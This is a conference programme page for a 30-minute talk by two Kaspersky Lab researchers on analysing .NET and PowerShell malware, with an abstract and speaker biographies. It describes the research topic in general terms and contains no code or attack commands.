The TAO of .NET and PowerShell malware analysis

Wednesday 30 September 15:00 - 15:30, Green room

Santiago Pontiroli (Kaspersky Lab)
Roberto Martinez (Kaspersky Lab)

  download slides (PDF)

With the ubiquitous adoption of Microsoft's .NET and PowerShell frameworks, an ever increasing number of software development and IT ninjas have joined a nascent tradition of professionals leveraging these powerful environments for added efficacy in their everyday jobs. With a wide array of libraries and cmdlets at their fingertips, the need to reinvent the wheel is long forgotten.

Of course, malware writers are not far behind - they too have seen the light and are eager to use these convenient tools against us. Whether it's for everyday ransomware or state-sponsored targeted campaigns, cybercriminals are now emboldened by a new arsenal that enables them to adapt with ease and agility. Are you ready to defend yourself against this emerging threat?

It's time to understand our adversaries' capabilities. We'll analyse select in-the-wild malware samples, picking apart the inner workings of these dastardly creations. We'll introduce the cloaking mechanisms adopted by cybercriminals, moving beyond managed code in executed environments to the devious packers, obfuscators and crypters leveraged in conjunction with these powerful frameworks in order to baffle malware analysts and forensic investigators.

Knowing is not enough; we must apply. Willing is not enough; we must do. With a plethora of post exploitation and lateral movement tools created and customized every day in rapid application development environments and high-level programming languages, defending against this kind of pervasive opponent is a full-time job.

Click here for more details about the conference.

Santiago Pontiroli

Santiago Pontiroli

Santiago Pontiroli joined Kaspersky Lab as a Security Researcher in October 2013. His principal responsibilities include the analysis and investigation of security threats in the SOLA region (South of Latin America), web application security, the development of automatization tools stemming from threat intelligence studies and the reverse engineering of programs with malicious code. Before joining Kaspersky Lab, Santiago served as Development Leader in Accenture for projects like Site Concept Studio and Avanade Connected Methods, where he supervised all technical aspects of his teams, developed and presented demos on the different platforms and offered technical support to the sales team. Prior to Accenture, Santiago worked as a consultant for several companies providing support on access control software, system and network administration, server hardening and web application security. Santiago holds degrees in systems engineering and systems analysis from the Universidad Tecnológica Nacional F.R.L.P in Buenos Aires, Argentina. He is fluent in English and Spanish.

@spontiroli

Roberto Martinez

Roberto Martinez

Roberto Martinez joined Kaspersky Lab's Global Research and Analysis Team in April 2012. He is responsible for monitoring and detecting new cyber threats. Martinez is a former security consultant and trainer for governments, military, intelligence agencies, financial institutions and private corporations in Latin America. He is a Member of ALAPSI (Latin America Association of Information Security Professionals) in the Incident Response commission. Martinez has extensive experience as a senior instructor in IT and information security, and also as a digital forensics ivestigator, security researcher and international speaker. He studied at the University of Guadalajara and Tec Milenio (ITESM).

@r0bertmart1nez